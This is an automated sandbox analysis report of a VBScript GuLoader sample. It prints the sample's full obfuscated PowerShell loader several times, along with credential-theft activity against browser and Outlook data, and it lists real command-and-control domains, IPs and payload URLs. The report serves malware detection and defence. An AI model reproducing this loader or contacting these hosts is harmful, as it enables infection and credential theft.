kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$claJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$claJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000016.00000002.2532785700.0000000002750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2533029666.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1842902275.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.2534596239.00000000013E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.1880343761.0000000022820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2534939674.0000000002800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information221
          Scripting
          Valid Accounts1
          Windows Management Instrumentation
          221
          Scripting
          1
          Abuse Elevation Control Mechanism
          1
          Deobfuscate/Decode Files or Information
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          3
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          LSASS Memory14
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts11
          Command and Scripting Interpreter
          1
          Registry Run Keys / Startup Folder
          411
          Process Injection
          4
          Obfuscated Files or Information
          Security Account Manager1
          Query Registry
          SMB/Windows Admin Shares1
          Email Collection
          4
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell
          Login Hook1
          Registry Run Keys / Startup Folder
          1
          Software Packing
          NTDS21
          Security Software Discovery
          Distributed Component Object ModelInput Capture5
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets1
          Process Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Masquerading
          Cached Domain Credentials31
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
          Virtualization/Sandbox Evasion
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
          Process Injection
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Rundll32
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1450445 Sample: IMG-466573885783553Folketin... Startdate: 01/06/2024 Architecture: WINDOWS Score: 100 51 www.slamdrops.com 2->51 53 www.led-svitidla.eu 2->53 55 6 other IPs or domains 2->55 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 6 other signatures 2->73 12 wscript.exe 1 2->12         started        15 wab.exe 3 1 2->15         started        17 wab.exe 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 97 VBScript performs obfuscated calls to suspicious functions 12->97 99 Suspicious powershell command line found 12->99 101 Wscript starts Powershell (via cmd or directly) 12->101 103 3 other signatures 12->103 21 powershell.exe 14 19 12->21         started        process6 dnsIp7 57 ramirex.ro 188.215.50.15, 443, 49700, 49707 WEBCLASSITRO Romania 21->57 75 Suspicious powershell command line found 21->75 77 Very long command line found 21->77 79 Found suspicious powershell code related to unpacking or dynamic code loading 21->79 25 powershell.exe 17 21->25         started        28 conhost.exe 21->28         started        30 cmd.exe 1 21->30         started        signatures8 process9 signatures10 85 Writes to foreign memory regions 25->85 87 Found suspicious powershell code related to unpacking or dynamic code loading 25->87 32 wab.exe 6 25->32         started        35 cmd.exe 1 25->35         started        37 wab.exe 25->37         started        process11 signatures12 65 Maps a DLL or memory area into another process 32->65 39 dczsDTwoOAPdxoSvtjazysDUwNBh.exe 32->39 injected process13 signatures14 81 Maps a DLL or memory area into another process 39->81 83 Found direct / indirect Syscall (likely to bypass EDR) 39->83 42 clip.exe 1 13 39->42         started        process15 signatures16 89 Tries to steal Mail credentials (via file / registry access) 42->89 91 Tries to harvest and steal browser information (history, passwords, etc) 42->91 93 Modifies the context of a thread in another process (thread injection) 42->93 95 2 other signatures 42->95 45 dczsDTwoOAPdxoSvtjazysDUwNBh.exe 42->45 injected 49 firefox.exe 42->49         started        process17 dnsIp18 59 led-svitidla.eu 37.235.104.9, 49711, 49712, 49713 SUPERNETWORK_CZ Czech Republic 45->59 61 beldecor.net 193.37.145.73, 49715, 49716, 49717 RMI-FITECHFR France 45->61 63 www.387mfyr.sbs 137.220.252.40, 49710, 80 BCPL-SGBGPNETGlobalASNSG Singapore 45->63 105 Found direct / indirect Syscall (likely to bypass EDR) 45->105 signatures19

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          IMG-466573885783553Folketingsmedlemmers.vbs13%ReversingLabsScript-WScript.Trojan.GuLoader
          IMG-466573885783553Folketingsmedlemmers.vbs14%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          beldecor.net1%VirustotalBrowse
          led-svitidla.eu0%VirustotalBrowse
          ramirex.ro0%VirustotalBrowse
          www.led-svitidla.eu0%VirustotalBrowse
          www.andywork.one0%VirustotalBrowse
          www.slamdrops.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://aka.ms/pscore6lB0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.387mfyr.sbs
          137.220.252.40
          truefalse
            unknown
            beldecor.net
            193.37.145.73
            truefalseunknown
            led-svitidla.eu
            37.235.104.9
            truefalseunknown
            ramirex.ro
            188.215.50.15
            truefalseunknown
            www.beldecor.net
            unknown
            unknownfalse
              unknown
              www.led-svitidla.eu
              unknown
              unknownfalseunknown
              www.andywork.one
              unknown
              unknownfalseunknown
              www.slamdrops.com
              unknown
              unknownfalseunknown
              NameMaliciousAntivirus DetectionReputation
              https://ramirex.ro/Rutschebanes.qxdfalse
                unknown
                http://www.led-svitidla.eu/abt9/false
                  unknown
                  http://www.led-svitidla.eu/abt9/?Of5HNz9=iV9adYjvPp7RuLwaP6BmForAyDRLfg4mpsRDBpobO1h4QpcDO6+h8uyV1/sip+su221s2KGGsEsC4t0dUTAnOg7+9cTY95M3z71wQoeHgy2DqTBwSPZzUbg36nzdDZOI6y7kx7FtYrhA&HvxX=KFLDJfalse
                    unknown
                    http://www.beldecor.net/abt9/?Of5HNz9=U+tTJKHHkznvwAdOTVuKaX3FkVtJQL73z6Knbsq9f/vaKulnAbb7PLKV5/tS55IHZlIFY34dfjld794ib/iuaW0ctDHRV5MOwCy1+9JCA1F7uH49s/OETdfla7HVUoCSmFvZju33t//s&HvxX=KFLDJfalse
                      unknown
                      https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.binfalse
                        unknown
